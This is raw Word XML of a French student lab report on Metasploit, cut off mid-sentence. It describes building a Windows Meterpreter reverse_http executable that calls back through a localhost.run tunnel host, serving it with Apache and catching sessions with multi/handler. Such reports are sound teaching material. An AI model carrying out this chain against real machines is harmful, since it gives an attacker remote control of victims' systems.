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854B556" w14:textId="6662FA53" w:rsidR="00311264" w:rsidRDefault="00B707AB" w:rsidP="000B720B">
      <w:pPr>
        <w:pStyle w:val="Titre"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="0"/>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707AB">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="0"/>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Security challenge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747E2B6D" w14:textId="77777777" w:rsidR="000B720B" w:rsidRDefault="000B720B" w:rsidP="000B720B">
      <w:pPr>
        <w:spacing w:before="18"/>
        <w:ind w:right="673"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5393986B" w14:textId="7E399938" w:rsidR="000B720B" w:rsidRPr="000B720B" w:rsidRDefault="000B720B" w:rsidP="00061923">
      <w:r w:rsidRPr="00C460D9">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>Réalisée</w:t>
      </w:r>
      <w:r w:rsidRPr="00C460D9">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C460D9">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>par</w:t>
      </w:r>
      <w:r w:rsidRPr="00C460D9">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C460D9">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C460D9">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C460D9">
        <w:t>Lahtani Iliass</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ratayl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Zakaria</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B52C23" w14:textId="604B3263" w:rsidR="000B720B" w:rsidRPr="00E21A61" w:rsidRDefault="000B720B" w:rsidP="00061923">
      <w:pPr>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="Membres_du_Jury_:___Encadré_par_:"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00C460D9">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Encadré par</w:t>
      </w:r>
      <w:r w:rsidRPr="00C460D9">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C460D9">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="Mr._MEKOUAR_Khalid_(Président_du_Jury)__"/>
      <w:bookmarkStart w:id="2" w:name="Mr._BENABBOU_Abderrahim"/>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="7E2A3A7C" w14:textId="3FD8E0EC" w:rsidR="000B720B" w:rsidRPr="000B720B" w:rsidRDefault="000B720B" w:rsidP="00061923">
      <w:r w:rsidRPr="00C460D9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C460D9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mr.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C460D9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LAHMER</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C460D9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mohammed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FCB8EE" w14:textId="0AFB1BA6" w:rsidR="00D35232" w:rsidRDefault="00D35232" w:rsidP="00D35232"/>
    <w:p w14:paraId="13CE198D" w14:textId="7CC335AE" w:rsidR="00D35232" w:rsidRPr="00DC0E7D" w:rsidRDefault="00DC0E7D" w:rsidP="00D35232">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC0E7D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD099AA" w14:textId="79DA6C50" w:rsidR="00B707AB" w:rsidRDefault="00DC0E7D" w:rsidP="004175C3">
      <w:r w:rsidRPr="00DC0E7D">
        <w:t>Le présent rapport a pour but de présenter les résultats de notre projet de sécurité . Nous avons analysé les vulnérabilités existantes. Ce rapport décrit les étapes que nous avons suivies pour mener à bien ce projet et les résultats obtenus</w:t>
      </w:r>
      <w:r w:rsidR="004A3B3E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5E18E5" w14:textId="70EE0BDD" w:rsidR="00B707AB" w:rsidRDefault="00B707AB" w:rsidP="00B707AB"/>
    <w:p w14:paraId="01099150" w14:textId="60BBDDEE" w:rsidR="000C7134" w:rsidRPr="00A8771E" w:rsidRDefault="000C7134" w:rsidP="000C7134">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A8771E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24ADB80C" wp14:editId="3BDCFB02">
            <wp:extent cx="1019175" cy="10191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inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00A8771E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A8771E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A8771E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223DE115" w14:textId="6BFEE6E8" w:rsidR="000C7134" w:rsidRDefault="000C7134" w:rsidP="000C7134">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7134">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Est un outil open source pour le développement et l'exécution d'exploits contre des vulnérabilités dans les systèmes informatiques. Il fournit une plateforme complète pour effectuer des tests de pénétration et des évaluations de sécurité</w:t>
      </w:r>
      <w:r w:rsidRPr="000C7134">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CED466C" w14:textId="28D8CAD4" w:rsidR="00183568" w:rsidRDefault="00183568" w:rsidP="000C7134">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>Terminal 1 :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12967594" w14:textId="1C572E70" w:rsidR="00B20C2E" w:rsidRDefault="00B20C2E" w:rsidP="000C7134">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="579D46FE" wp14:editId="35566986">
            <wp:extent cx="4535351" cy="356981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4549991" cy="3581341"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F89B4E4" w14:textId="76BB82D1" w:rsidR="00832839" w:rsidRDefault="00A8771E" w:rsidP="000C7134">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="hgkelc"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hgkelc"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">La commande </w:t>
      </w:r>
      <w:r w:rsidRPr="00A8771E">
        <w:rPr>
          <w:rStyle w:val="hgkelc"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH-keygen </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hgkelc"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nous invite à définir une « phrase de passe (</w:t>
      </w:r>
      <w:r w:rsidRPr="00A8771E">
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>contient souvent des suites de mots qui ressemblent parfois à une phrase pour des raisons mnémotechniques</w:t>
      </w:r>
      <w:r w:rsidRPr="00A8771E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hgkelc"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>» pour la clé privée</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hgkelc"/>
        </w:rPr>
        <w:t>. Contrairement à un mot de passe, une phrase de passe peut contenir des espaces. Car elle doit comporter plusieurs mots, la phrase de passe est alors tout aussi facile à retenir et difficile à deviner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B945205" w14:textId="4F64C201" w:rsidR="00355B4C" w:rsidRDefault="00495E55" w:rsidP="000C7134">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="hgkelc"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6773758E" wp14:editId="3151D646">
            <wp:extent cx="5760720" cy="262382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a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="2623820"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61713B11" w14:textId="35B2DDEB" w:rsidR="000C7134" w:rsidRDefault="00355B4C" w:rsidP="000C7134">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00355B4C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>localhost.run</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00355B4C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00355B4C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>est un service qui vous permet d'héberger un site web ou une application web sur votre machine locale et de l'accéder de n'importe où dans le monde. Il crée un tunnel sécurisé depuis internet vers votre localhost, ce qui rend possible l'accès à votre serveur web local depuis n'importe où</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737A4302" w14:textId="2F40E135" w:rsidR="000C7134" w:rsidRDefault="00495E55" w:rsidP="00B707AB">
      <w:r w:rsidRPr="00495E55">
        <w:t>-pour l’instant une adresse a été générer aléatoirement pour notre serveur</w:t>
      </w:r>
      <w:r w:rsidR="00CC5301">
        <w:t xml:space="preserve"> donc il nous faut laisser le serveur lancer pour continuer notre travaille pour cela</w:t>
      </w:r>
      <w:r w:rsidRPr="00495E55">
        <w:t xml:space="preserve"> on va lancer un autre terminal pour continuer les différents taches sous dessous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C2A367" w14:textId="3805CE05" w:rsidR="008666A9" w:rsidRDefault="008666A9" w:rsidP="008666A9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>Terminal 2 :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79519131" w14:textId="493C0F1E" w:rsidR="00495E55" w:rsidRDefault="00495E55" w:rsidP="00B707AB"/>
    <w:p w14:paraId="201CD7BA" w14:textId="0207E2E6" w:rsidR="00495E55" w:rsidRDefault="00CB5035" w:rsidP="00B707AB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03985405" wp14:editId="16BB533D">
            <wp:extent cx="5760720" cy="4343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a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="434340"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B716043" w14:textId="31EB7E11" w:rsidR="00767502" w:rsidRDefault="00767502" w:rsidP="00B707AB">
      <w:r>
        <w:t>-il faut mentionner l’adresse qui a été générer et choisir le nom du fichier exécutable (.exe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32500DD2" w14:textId="3C378B7F" w:rsidR="00767502" w:rsidRDefault="00767502" w:rsidP="00B707AB">
      <w:r w:rsidRPr="00767502">
        <w:t xml:space="preserve">Cette commande est utilisée pour générer un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00767502">
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00767502">
        <w:t xml:space="preserve"> exécutable Windows en utilisant le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00767502">
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00767502">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00767502">
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00767502">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00767502">
        <w:t>reverse_http</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00767502">
        <w:t xml:space="preserve"> et pour l'enregistrer en tant que "</w:t>
      </w:r>
      <w:r w:rsidR="00CB5035" w:rsidRPr="00CB5035">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html/hii.exe </w:t>
      </w:r>
      <w:r w:rsidRPr="00767502">
        <w:t xml:space="preserve">". Le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00767502">
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00767502">
        <w:t xml:space="preserve"> se connectera à la machine de l'attaquant avec l'IP "</w:t>
      </w:r>
      <w:r w:rsidR="00CB5035" w:rsidRPr="00CB5035">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">7c896fbe63ffa0.lhr.life </w:t>
      </w:r>
      <w:r w:rsidRPr="00767502">
        <w:t xml:space="preserve">" sur le port </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB5035">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
      <w:r w:rsidRPr="00767502">
        <w:t xml:space="preserve"> lorsqu'il sera exécuté sur le système cible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EF5E6E" w14:textId="27FEAB2E" w:rsidR="00CC5301" w:rsidRDefault="00CC5301" w:rsidP="00B707AB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FF9C605" wp14:editId="224DBFF3">
            <wp:extent cx="5760720" cy="21266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5760720" cy="2126615"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F2956E" w14:textId="056C81DB" w:rsidR="00767502" w:rsidRDefault="00CC5301" w:rsidP="00B707AB">
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00503A37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>service apache2 start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7185F542" w14:textId="7D00C572" w:rsidR="00725D86" w:rsidRDefault="00725D86" w:rsidP="00725D86">
      <w:r w:rsidRPr="00725D86">
        <w:t>Cette commande démarre le service de serveur web Apache2 sur un système d'exploitation Linux. Le serveur web Apache2 est utilisé pour héberger des pages web et les servir aux clients sur Internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5CF31E" w14:textId="77777777" w:rsidR="00DC1FDB" w:rsidRDefault="00DC1FDB" w:rsidP="00B707AB"/>
    <w:p w14:paraId="18AF7AC4" w14:textId="4480904D" w:rsidR="00CC5301" w:rsidRDefault="00CC5301" w:rsidP="00B707AB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10537131" wp14:editId="590B4314">
            <wp:extent cx="5760720" cy="233108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a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="2331085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D7D9B4" w14:textId="7673CB8F" w:rsidR="00DC1FDB" w:rsidRDefault="00DC1FDB" w:rsidP="00B707AB">
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00503A37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>service apache2 stop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B0338F" w14:textId="77777777" w:rsidR="00D35232" w:rsidRDefault="00D35232" w:rsidP="00B707AB">
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5355133A" w14:textId="61AF9C8C" w:rsidR="00D35232" w:rsidRPr="00D35232" w:rsidRDefault="00D35232" w:rsidP="00B707AB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Est une commande pour commencer </w:t>
      </w:r>
      <w:r w:rsidRPr="00D35232">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D35232">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D35232">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D35232">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>framework</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5DD45A66" w14:textId="389A28AB" w:rsidR="00D35232" w:rsidRDefault="00D35232" w:rsidP="00B707AB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3066C044" wp14:editId="38F6FDCF">
            <wp:extent cx="5760720" cy="24371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a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="2437130"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D16E784" w14:textId="07391044" w:rsidR="002142C8" w:rsidRPr="002142C8" w:rsidRDefault="002142C8" w:rsidP="00B707AB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002142C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBF28E4" w14:textId="442EE56B" w:rsidR="002142C8" w:rsidRDefault="002142C8" w:rsidP="00B707AB">
      <w:r w:rsidRPr="002142C8">
        <w:t xml:space="preserve">L'utilisation de la commande  dans un script </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002142C8">
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002142C8">
        <w:t xml:space="preserve"> indique qu'il s'agit d'un gestionnaire d'exploits. Cela signifie que ce script sera utilisé pour recevoir des connexions entrantes provenant d'autres exploits et gérer les sessions d'exploitation qui en découlent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5490AD" w14:textId="369006FA" w:rsidR="00D35232" w:rsidRPr="00DC0E7D" w:rsidRDefault="00DC0E7D" w:rsidP="00B707AB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC0E7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC0E7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> PAYLOAD </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC0E7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC0E7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC0E7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC0E7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC0E7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>reverse_http</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1642EC75" w14:textId="1FF03F9A" w:rsidR="00DC1FDB" w:rsidRDefault="00DC0E7D" w:rsidP="00B707AB">
      <w:r w:rsidRPr="00DC0E7D">
        <w:t xml:space="preserve">Cette commande configure le type de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC0E7D">
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC0E7D">
        <w:t xml:space="preserve"> à utiliser pour une exploitation informatique sur un système Windows. Le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC0E7D">
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC0E7D">
        <w:t xml:space="preserve"> choisi est "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC0E7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC0E7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
